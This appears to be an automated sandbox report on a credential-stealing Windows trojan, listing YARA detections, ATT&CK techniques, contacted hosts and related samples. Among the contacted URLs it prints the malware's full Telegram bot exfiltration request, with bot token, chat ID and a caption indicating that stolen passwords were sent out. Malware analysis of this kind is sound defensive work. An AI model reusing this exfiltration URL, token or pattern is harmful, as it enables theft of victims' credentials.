              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected MassLogger RAT
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00358C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00358C4F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0035923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0035923B

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts              		3
              Native API              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Valid Accounts              		3
              Obfuscated Files or Information              		Security Account Manager1
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation              		1
              DLL Side-Loading              		NTDS137
              System Information Discovery              		Distributed Component Object Model21
              Input Capture              		3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
              Process Injection              		2
              Valid Accounts              		LSA Secrets241
              Security Software Discovery              		SSH3
              Clipboard Data              		14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Virtualization/Sandbox Evasion              		Cached Domain Credentials11
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
              Access Token Manipulation              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
              Process Injection              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              mnXS9meqtB.exe57%VirustotalBrowse
              mnXS9meqtB.exe79%ReversingLabsWin32.Trojan.AutoitInject
              mnXS9meqtB.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              		104.21.16.1
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  checkip.dyndns.com
                  		193.122.6.168
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        		high
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          https://api.telegram.org/bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695799026&caption=user%20/%20Passwords%20/%208.46.123.189false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.telegram.orgRegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org/botRegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://checkip.dyndns.org/qRegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.4777410564.00000000031C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://reallyfreegeoip.org/xml/8.46.123.189xRegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000318C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://checkip.dyndns.comRegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://api.telegram.orgRegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4777410564.0000000003119000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      		api.telegram.orgUnited Kingdom
                                                      		62041TELEGRAMRUfalse
                                                      104.21.16.1
                                                      		reallyfreegeoip.orgUnited States
                                                      		13335CLOUDFLARENETUSfalse
                                                      193.122.6.168
                                                      		checkip.dyndns.comUnited States
                                                      		31898ORACLE-BMC-31898USfalse

                                                      General Information

                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1589080
                                                      Start date and time:2025-01-11 09:14:25 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 1s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:6
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:mnXS9meqtB.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:8bf61f3a1d267156d16c19ef19476210c7aca81406afafd7abbf139a5ccf61a1.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 54
                                                      • Number of non-executed functions: 296
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      03:15:29API Interceptor11205867x Sleep call for process: RegSvcs.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      149.154.167.220Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                        h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                              c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                  grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          104.21.16.18L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                          • www.rafconstrutora.online/0xli/
                                                                          NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                          • www.kkpmoneysocial.top/86am/
                                                                          JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                          193.122.6.168gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          checkip.dyndns.comaS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 158.101.44.242
                                                                          gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 193.122.6.168
                                                                          ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 193.122.6.168
                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 193.122.130.0
                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.122.130.0
                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 132.226.247.73
                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 132.226.8.169
                                                                          b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 193.122.130.0
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 193.122.6.168
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 193.122.6.168
                                                                          reallyfreegeoip.orgaS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.112.1
                                                                          gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.64.1
                                                                          ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.48.1
                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.32.1
                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.112.1
                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.80.1
                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.80.1
                                                                          b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.80.1
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.96.1
                                                                          api.telegram.orgExodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                          • 149.154.167.220
                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ORACLE-BMC-31898USaS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 158.101.44.242
                                                                          gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 193.122.6.168
                                                                          ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 193.122.6.168
                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 193.122.130.0
                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.122.130.0
                                                                          b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 193.122.130.0
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 193.122.6.168
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 193.122.6.168
                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 193.122.130.0
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.122.6.168
                                                                          TELEGRAMRUExodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                          • 149.154.167.220
                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          CLOUDFLARENETUS8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                          • 188.114.97.3
                                                                          aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.112.1
                                                                          gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.64.1
                                                                          ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.48.1
                                                                          Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                          • 104.16.185.241
                                                                          dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.13.205
                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.32.1
                                                                          z6tNjJC614.exeGet hashmaliciousFormBookBrowse
                                                                          • 104.21.42.77
                                                                          b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.56.70
